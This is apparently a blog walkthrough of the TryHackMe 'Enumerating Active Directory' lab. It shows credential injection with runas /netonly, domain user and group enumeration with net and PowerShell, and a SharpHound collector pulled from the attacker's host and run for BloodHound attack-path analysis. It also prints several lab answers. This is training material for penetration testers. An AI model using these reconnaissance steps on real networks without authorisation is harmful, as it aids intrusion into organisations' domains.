TryHackMe | Enumerating Active Directory

In this walkthrough, I demonstrate the steps I took to complete the "Enumerating Active Directory" network on TryHackMe.
In: TryHackMe, Active Directory, Attack, OSCP Prep, THM: Compromising AD

Task 1: Why AD Enumeration

Read through and understand the importance of Active Directory enumeration and how – even with low-privileged credentials – you can find some useful information to better understand the environment.

Also understand the cyclical nature of enumeration and compromise as the attacker pivots through the network.

  1. Initial Recon
  2. Initial Compromise
  3. Foothold
  4. Escalate Privileges
  5. Internal Recon
  6. Lateral Pivot
  7. Persistence
  8. Escalate Privileges
  9. Objectives met?
    • No.
      • Return to step 5
    • Yes.
      • Complete mission

Connecting to the Network

I am using my own Kali VM to complete this room, not the AttackBox provided by TryHackMe.

Download the VPN connection pack and connect to the VPN as a background service.

# Run the VPN connection as a daemon in the background
sudo openvpn --config ./adenumeration.ovpn --daemon

When finished with the room, you can terminate the VPN connection with this command:

# Find the PID of the OpenVPN process
pid=$(sudo ps aux | grep -v grep | grep -i adenumeration | awk -v FS=' ' '{print $2}')

# Send SIGTERM to the PID
sudo kill -9 $pid

Edit DNS Configuration

I didn't follow the guidance in the room and took a much more simplistic approach. Please note that the /etc/resolv.conf configurations in the before and after shown below are specific to my environment.


# Generated by NetworkManager
search cyber.range

/etc/resolv.conf (before)

After is the IP address of the thmdc (domain controller) in the network diagram. The domain controller is acting as the DNS resolver in the network environment.

# Generated by NetworkManager
search cyber.range
# Shorten name resolution timeouts to 1 second
options timeout:1
# Only attempt to resolve a hostname 2 times
options attempts:2

/etc/resolv.conf (after)

Run sudo systemctl restart networking.service after the changes to apply the changes.

Test Hostname Lookups


Why does this work?

You're instructing the DNS resolution service to search between and . So, let's say you say something like this:


What's happening is this:

  1. First ask – "Do you know the IP address of ?"
  • If the domain controller answers, then stop the lookup process.
  • If the domain controller doesn't have the answer, move on.
  1. Then, ask – "Do you know the IP address of ?"

Request Credentials

This step is simulating the initial breach and credential discovery process. Navigate to in your browser and request some AD credentials.

Test SSH

Test your credentials using SSH to connect to a jump host. Replace with yours retrieved from the server.


Test RDP

Replace with yours retrieved from the server.

The /drive:.,kali-share option will let you mount the current working directory as a network drive in the RDP session, so you can upload and download files.

The +clipboard option allows copying and pasting between the target.

xfreerdp / /u:'' /p:'password' / /drive:.,kali-share +clipboard

Task 2: Credential Injection

Read through and understand how you may find Active Directory credentials even on hosts unjoined to the domain. If that's the case, there are some tools we can use to leverage domain credentials when we've landed a foothold on an unjoined host.


In the example, we have the following command:

  • /netonly - use the credentials for network sessions only, all other commands run in the current user session on the local host
  • /user - the user we want to authenticate as in network sessions
  • cmd.exe spawn a new command prompt window with the injected network credential
runas.exe /netonly /user:domain.tld\username cmd.exe

An attacker could then use the network session to enumerate SYSVOL on the domain controller, since even low level users can read it

Kerberos vs. NTLM

Kerberos authentication relies on fully qualified domain names (FQDN), because the FQDN of the service is referenced directly in the ticket. In Active Directory environments where Kerberos authentication is enabled, you may still be able to force services to fall back to NTLM authentication by using the IP address of a host.

NTLM is so heavily integrated into Microsoft products that in most cases it's going to be running side-by-side with Kerberos.


What native Windows binary allows us to inject credentials legitimately into memory?

Show Answer


What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

Show Answer


What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

Show Answer


When performing dir \\\SYSVOL, what type of authentication is performed by default?

Show Answer

Kerberos authentication

Task 3: Enumeration through MMC

Connect to the Jump Host

I transferred the VPN connection file to a Windows VM in my lab to test credential injection in the previous task. However, despite all of the various things i tried, I could not get DNS resolution to work from my Windows VM. So, I'll just be using the jump host here.

xfreerdp / /u:'' /p:'password123' / /drive:.,kali-share +clipboard

You don't need to worry about enabling RSAT if you're using the jump host. You can also skip the part about changing the forest and domain, as the jump host is already joined to the domain.


How many Computer objects are part of the Servers OU?

Show Answer


How many Computer objects are part of the Workstations OU?

Show Answer


How many departments (Organisational Units) does this organisation consist of?

Show Answer


How many Admin tiers does this organisation have?

Show Answer


What is the value of the flag stored in the description attribute of the account?

Show Answer


Task 4: Enumerating though Command Prompt

net command

  • net user /domain – Run on a domain-joined host to enumerate domain users
  • net user /domain – Run on a domain-joined host to get information about a specific domain user
  • net group /domain – Run on a domain-joined host to enumerate domain groups
  • net group groupName /domain – Run on a domain-joined host to get the members of a domain group
  • net accounts /domain – Run on a domain-joined host to show the domain password and account lockout policy


  • net does not show nested groups
  • net only shows up to 10 groups even if a user is in more


Apart from the Domain Users group, what other group is the aaron.harris account a member of?

Show Answer

Internet Access

Is the Guest account active? (Yay,Nay)

Show Answer


How many accounts are a member of the Tier 1 Admins group?

Show Answer


What is the account lockout duration of the current password policy in minutes?

Show Answer


Task 5: Enumeration through PowerShell

SSH to the Jump Host


Run the command powershell to open a PowerShell terminal. Since we are running PowerShell on a domain-joined host, we do not need to pass the -Server parameter shown in the examples.


  • Get-ADUser -Filter * – return all domain users
  • Get-ADUser -Filter 'Name -like "*stevens"' – find any user where name ends in ...stevens
  • Get-ADUser -Identity john.doe -Properties * – find the user john.doe and return all properties


  • Get-ADGroup -Filter * – return all domain groups
  • Get-ADGroup -Identity Administrators | Get-ADGroupMember – pipe the Administrators group object to Get-ADGroupMember to retrieve members of the group

AD Objects

  • Get any domain objects that we modified on or after a specific date and time
# February 28, 2022 00:00:00 (system time zone)
$modifiedDate = Get-Date '2022/02/28'
Get-ADObject -Filter "whenChanged -ge $modifiedDate" -IncludeDeletedObjects


  • Get-ADDomain – get information about the domain from the domain controller

Change a User Password

$oldPass = Read-Host -AsSecureString -Prompt 'Enter the old password'
$newPass = Read-Host -AsSecureString -Prompt 'Enter the new password'
Set-ADAccountPassword -Identity -OldPassword $oldpPass -NewPassword $newPass

Bonus: No RSAT? No Problem.

I wrote a brief document here on how you can borrow the MicrosoftActiveDirectory.Management.dll from any other Windows host where you've enabled RSAT to perform these same recon tasks.

If you're on a host that is not joined to the domain, import the .dll and then use the -Server parameter to make the queries.


What is the value of the Title attribute of Beth Nolan (beth.nolan)?

Show Answer


What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

Show Answer


When was the Tier 2 Admins group created?

Show Answer

2/24/2022 10:04:41 PM

What is the value of the SID attribute of the Enterprise Admins group?

Show Answer


Which container is used to store deleted AD objects?

Show Answer

CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task 6: Bloodhound

Read and understand the significance and history of the Bloodhound and what makes it such a powerful domain enumeration tool.

Bloodhound and Collectors

Bloodhound is the software that runs locally on an attacker's machine. The attacker must run a "collector" on a target where it will enumerate lots of information about the domain. After the collector finishes running, it will output a series of .json files for import into the attacker's Bloodhound interface.


Download Bloodhound

You can download the latest release of sharphound.exe from the GitHub releases page:

Releases · BloodHoundAD/SharpHound
Contribute to BloodHoundAD/SharpHound development by creating an account on GitHub.

Transfer to the Target

On my Kali VM, I am going to host a Python3 web server to transfer the .zip archive to the SSH session running on the jump host.

sudo python3 -m http.server 80

Run Bloodhound

Now, from the jump host in the PowerShell session, I'll use these commands:

cd ~/Documents

# Download the .zip file from Kali
Invoke-WebRequest http://kali-vpn-ip/ -OutFile SharpHound-v1.1

# Unzip the archive with PowerShell
cd SharpHound-v1.1.0

Now, we're ready to run the collector, sharphound.exe .

.\SharpHound.exe --CollectionMethods All --Domain --ExcludeDCs

Transfer Data to Kali

Now that the collector has finished running, I've got a that I need to transfer back to Kali for analysis. I'll use SCP to transfer the file.

scp .

Analyze with Bloodhound

If this is your first time running Bloodhound, follow the instructions in the room to get started.

neo4j console &
bloodhound &

Drag and drop the .zip file to Bloodhound and wait for it to load the data.

Attack Paths

  • You can use the Search for a node... area to find specific users, groups, etc.
  • You can click on specific properties of the object to graph things out (eg. group memberships)
  • You can use the Analysis tab to run built-in queries (or write your own)
  • Much, much more


What command can be used to execute Sharphound.exe and request that it recovers Session information only from the domain without touching domain controllers?

Show Answer

SharpHound.exe --CollectionMethods All --Domain --ExcludeDCs

Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

Show Answer


How many machines do members of the Tier 1 Admins group have administrative access to?

Show Answer


How many users are members of the Tier 2 Admins group?

Show Answer


Task 7: Conclusion

Additional Enumeration Techniques


I wrote some notes here on using a tool called ldapdomaindump .


There is a lot of documentation on the web about enumeration using PowerView, but beware that it is not a good option, as it is very easily detected.


Really interesting and not something I'm familiar with. Linking here for future reference:

Offensive WMI - Active Directory Enumeration (Part 5)
This blog is the fifth installation of the “Offensive WMI” series that I’ve been writing on, and this post will cover Active Directory enumeration. Active Directory (AD) is Microsoft’s implementation of a directory and IAM service for Windows domain networks – which enables admins to manage permissi…

Clean Up DNS Changes

This will be unique to your own system and environment. For me, I'll be referring back to the Before step here.

More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.